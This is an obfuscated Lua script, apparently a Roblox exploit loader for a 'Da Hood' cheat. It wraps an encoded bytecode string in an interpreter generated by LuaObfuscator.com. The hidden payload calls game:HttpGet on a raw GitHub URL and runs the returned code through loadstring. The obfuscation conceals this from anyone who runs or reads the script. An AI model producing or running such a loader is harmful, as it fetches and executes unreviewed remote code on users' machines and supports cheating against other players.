--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0) then v110=v5(v83,v19);v19=nil;v109=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-((2 -0) -1))))%((621 -(555 + 64))^(((v33-1) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v85-(v85%((1993 -(68 + 997)) -(214 + 713))) ;end end else local v86=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + 595))) or (1637 -(1369 + 154 + 114)) ;end end local function v21() local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 + (957 -(892 + 65)) ;end end end local function v22() local v36=180 -((1019 -(802 + 150)) + 113) ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + (4 -2) ;v36=1 -0 ;end if (v36==((2 -1) -0)) then return (v38 * (606 -(87 + 263))) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;return (v42 * 16777216) + (v41 * (47703 + 17833)) + (v40 * (1253 -(915 + 82))) + v39 ;end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(774 -(201 + 571))) then v48=v20(v45,13 + 8 ,40 -9 );v49=((v20(v45,133 -101 )==((1914 -(1789 + 124)) + 0)) and  -(1188 -(1069 + 118))) or (2 -1) ;v43=6 -3 ;end if (v43==(1 + 0)) then v46=1 -0 ;v47=(v20(v45,1 + 0 ,(1577 -(745 + 21)) -(368 + 146 + 277) ) * ((5 -3)^(100 -(266 -198)))) + v44 ;v43=20 -(1 + 9 + 8) ;end if (v43==(11 -8)) then if (v48==(442 -(327 + 89 + 26))) then if (v47==0) then return v49 * (0 -(1055 -(87 + 968))) ;else v48=1;v46=1080 -(1020 + 60) ;end elseif (v48==(879 + 1168)) then return ((v47==0) and (v49 * ((1 -0)/(438 -(145 + (1289 -996)))))) or (v49 * NaN) ;end return v8(v49,v48-((1319 + 134) -(44 + 386)) ) * (v46 + (v47/((1488 -(998 + 488))^(17 + 35)))) ;end if (v43==(0 + 0)) then v44=v23();v45=v23();v43=1;end end end local function v25(v50) local v51=0 -(0 -0) ;local v52;local v53;while true do if (v51==(1414 -(447 + 966))) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=1819 -(1703 + 114) ;end if (v51==((579 + 122) -(376 + 325))) then v52=nil;if  not v50 then local v103=1180 -(1123 + 57) ;while true do if (v103==(0 -0)) then v50=v23();if (v50==(0 -(0 + 0))) then return "";end break;end end end v51=1 + 0 ;end if (v51==(4 -2)) then v53={};for v94=15 -(9 + 5) , #v52 do v53[v94]=v2(v1(v3(v52,v94,v94)));end v51=379 -(85 + 291) ;end if (v51==(1268 -(243 + 1022))) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0 -0 ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v54==(1468 -(899 + 568))) then v58=(function() return {};end)();v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v54=(function() return 2 + 0 ;end)();end if (v54==(0 -0)) then local v90=(function() return 0;end)();local v91=(function() return;end)();while true do if (v90==0) then v91=(function() return 0;end)();while true do if (v91~=0) then else v55=(function() return function(v149,v150,v151) local v152=(function() return 603 -(268 + 335) ;end)();local v153=(function() return;end)();while true do if ((0 + 0)==v152) then v153=(function() return 0 + 0 ;end)();while true do if (v153==(0 -0)) then local v175=(function() return 65 -(30 + 35) ;end)();while true do if (v175~=(290 -(60 + 230))) then else local v180=(function() return 0;end)();while true do if (v180==(572 -(426 + 146))) then v149[v150-#"." ]=(function() return v151();end)();return v149,v150,v151;end end end end end end break;end end end;end)();v56=(function() return {};end)();v91=(function() return 1;end)();end if (1~=v91) then else v57=(function() return {};end)();v54=(function() return 1;end)();break;end end break;end end end if ((1 + 1)~=v54) then else local v92=(function() return 1456 -(282 + 1174) ;end)();local v93=(function() return;end)();while true do if (v92==0) then v93=(function() return 811 -(569 + 242) ;end)();while true do if ((2 -1)==v93) then v59[ #"91("]=(function() return v21();end)();v54=(function() return 8 -5 ;end)();break;end if (v93~=(0 + 0)) then else v61=(function() return {};end)();for v113= #"|",v60 do local v114=(function() return 1024 -(706 + 318) ;end)();local v115=(function() return;end)();local v116=(function() return;end)();local v117=(function() return;end)();while true do if (v114~=(1252 -(721 + 530))) then else v117=(function() return nil;end)();while true do if (0==v115) then local v173=(function() return 1271 -(945 + 326) ;end)();while true do if (v173~=(2 -1)) then else v115=(function() return 1;end)();break;end if (0~=v173) then else v116=(function() return v21();end)();v117=(function() return nil;end)();v173=(function() return 983 -(18 + 964) ;end)();end end end if (v115==1) then if (v116== #"|") then v117=(function() return v21()~=0 ;end)();elseif (v116==(2 + 0)) then v117=(function() return v24();end)();elseif (v116~= #"91(") then else v117=(function() return v25();end)();end v61[v113]=(function() return v117;end)();break;end end break;end if (v114==(700 -(271 + 429))) then v115=(function() return 0 + 0 ;end)();v116=(function() return nil;end)();v114=(function() return 1 + 0 ;end)();end end end v93=(function() return 1501 -(1408 + 92) ;end)();end end break;end end end if (v54~=(853 -(20 + 830))) then else for v96= #"]",v23() do local v97=(function() return v21();end)();if (v20(v97, #"|", #",")==(1086 -(461 + 625))) then local v104=(function() return 1288 -(993 + 295) ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v104~=2) then else while true do if (v105==0) then local v156=(function() return 0 + 0 ;end)();local v157=(function() return;end)();while true do if (v156==(1171 -(418 + 753))) then v157=(function() return 0 + 0 ;end)();while true do if (v157~=(739 -(542 + 196))) then else v105=(function() return  #"]";end)();break;end if (v157==(0 + 0)) then v106=(function() return v20(v97,3 -1 , #"xnx");end)();v107=(function() return v20(v97, #"0313",2 + 4 );end)();v157=(function() return 1;end)();end end break;end end end if (v105== #"91(") then if (v20(v107, #"nil", #"asd")~= #"{") then else v108[ #"0313"]=(function() return v61[v108[ #".com"]];end)();end v56[v96]=(function() return v108;end)();break;end if (v105== #"<") then local v159=(function() return 0;end)();local v160=(function() return;end)();while true do if (v159==(0 + 0)) then v160=(function() return 0 + 0 ;end)();while true do if (v160==0) then v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==0) then local v181=(function() return 529 -(406 + 123) ;end)();local v182=(function() return;end)();while true do if (v181==0) then v182=(function() return 1769 -(1749 + 20) ;end)();while true do if (v182~=(0 -0)) then else v108[ #"nil"]=(function() return v22();end)();v108[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v106== #"}") then v108[ #"gha"]=(function() return v23();end)();elseif (v106==(1 + 1)) then v108[ #"xxx"]=(function() return v23() -(2^(1338 -(1249 + 73))) ;end)();elseif (v106== #"gha") then local v188=(function() return 0 + 0 ;end)();while true do if (v188==(1121 -(118 + 1003))) then v108[ #"gha"]=(function() return v23() -(2^(1161 -(466 + 679))) ;end)();v108[ #"0313"]=(function() return v22();end)();break;end end end v160=(function() return 2 -1 ;end)();end if (v160==(2 -1)) then v105=(function() return 1902 -(106 + 1794) ;end)();break;end end break;end end end if (v105==(1 + 1)) then local v161=(function() return 377 -(142 + 235) ;end)();while true do if (v161~=1) then else v105=(function() return  #"nil";end)();break;end if (v161~=(0 + 0)) then else if (v20(v107, #"]", #"!")== #" ") then v108[1 + 1 ]=(function() return v61[v108[5 -3 ]];end)();end if (v20(v107,5 -3 ,979 -(553 + 424) )~= #"/") then else v108[ #"asd"]=(function() return v61[v108[ #"xnx"]];end)();end v161=(function() return 115 -(4 + 110) ;end)();end end end end break;end if (v104==(584 -(57 + 527))) then local v112=(function() return 0 + 0 ;end)();while true do if (v112==(1427 -(41 + 1386))) then v105=(function() return 103 -(17 + 86) ;end)();v106=(function() return nil;end)();v112=(function() return 1 + 0 ;end)();end if (v112~=(1 -0)) then else v104=(function() return 1 + 0 ;end)();break;end end end if (v104==(2 -1)) then v107=(function() return nil;end)();v108=(function() return nil;end)();v104=(function() return 2;end)();end end end end for v98= #"!",v23() do v57,v98,v28=(function() return v55(v57,v98,v28);end)();end return v59;end end end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[5 -(10 -7) ];local v67=v62[(1024 -(697 + 321)) -3 ];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1 + 0 ;local v73= -(4 -(7 -4));local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v87=1329 -(797 + 532) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 + 0 ];else v78[v87]=v75[v87 + (2 -1) + 0 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[2 -1 ];if (v81<=(1209 -(373 + 829))) then if ((625==625) and (v81<=(734 -(476 + 255)))) then if (v81<=(1131 -(369 + 761))) then if (v81>0) then local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==(1 + 0 + 0)) then v73=(v121 + v119) -((1 -0) -0) ;v122=0 -0 ;v118=2;end if ((238 -(64 + (466 -292)))==v118) then v119=v80[1 + 1 ];v120,v121=v71(v78[v119](v13(v78,v119 + (1 -0) ,v80[1230 -(322 + 905) ])));v118=(948 -(602 + 9)) -(144 + 192) ;end if ((588<1692) and (v118==(218 -((1231 -(449 + 740)) + 174)))) then for v169=v119,v73 do local v170=0;while true do if ((v170==0) or (4797<3651)) then v122=v122 + 1 ;v78[v169]=v120[v122];break;end end end break;end end else local v123=v80[2];local v124,v125=v71(v78[v123](v13(v78,v123 + (873 -(826 + 46)) + 0 ,v80[3])));v73=(v125 + v123) -(1 + 0) ;local v126=0 + 0 ;for v154=v123,v73 do local v155=1504 -(363 + 1141) ;while true do if (v155==(1580 -(1183 + (1344 -(245 + 702))))) then v126=v126 + (2 -(3 -2)) ;v78[v154]=v124[v126];break;end end end end elseif (v81>(2 + 0)) then v78[v80[1 + 1 ]]=v64[v80[3 + 0 ]];else v78[v80[2]]={};end elseif (v81<=(1980 -(1913 + 62))) then if (v81>(3 + 1)) then v78[v80[5 -3 ]]=v80[1936 -(565 + 1368) ];else local v132=v80[(1905 -(260 + 1638)) -5 ];local v133=v78[v80[1664 -(1477 + 184) ]];v78[v132 + (441 -(382 + 58)) ]=v133;v78[v132]=v133[v80[5 -1 ]];end elseif (v81>6) then v78[v80[2 + 0 ]]=v64[v80[859 -(564 + 292) ]];else local v139=0 -0 ;local v140;local v141;while true do if (v139==((1 + 0) -0)) then v78[v140 + 1 ]=v141;v78[v140]=v141[v80[11 -7 ]];break;end if (v139==(304 -(244 + 60))) then v140=v80[2 + (0 -0) ];v141=v78[v80[479 -(41 + 435) ]];v139=1002 -((2788 -1850) + 63) ;end end end elseif (v81<=(9 + 2)) then if ((v81<=(1134 -((2141 -(902 + 303)) + 189))) or (4177>4850)) then if (v81==8) then local v142=v80[1 + 1 ];v78[v142]=v78[v142](v13(v78,v142 + (1614 -(1565 + 48)) ,v73));else v78[v80[2 + 0 ]]={};end elseif (v81>(21 -11)) then do return;end else v78[v80[1140 -(782 + 356) ]]=v80[270 -(176 + 91) ];end elseif (v81<=13) then if ((v81>(30 -18)) or (400>1111)) then v78[v80[2 -0 ]]();else do return;end end elseif ((3051>1005) and (v81==(1106 -(975 + 117)))) then local v147=v80[1877 -(157 + (4137 -2419)) ];v78[v147]=v78[v147](v13(v78,v147 + 1 ,v73));else v78[v80[2 + 0 ]]();end v72=v72 + ((1 + 2) -2) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403563Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F736F6261636867726F6936372D6370752F6461682Q6F647363726970742F726566732F68656164732F6D61696E2F6461682Q6F6400094Q00027Q001207000100013Q001207000200023Q002004000200020003001205000400044Q0001000200044Q000800013Q00022Q000D0001000100012Q000C3Q00017Q00",v9(),...);
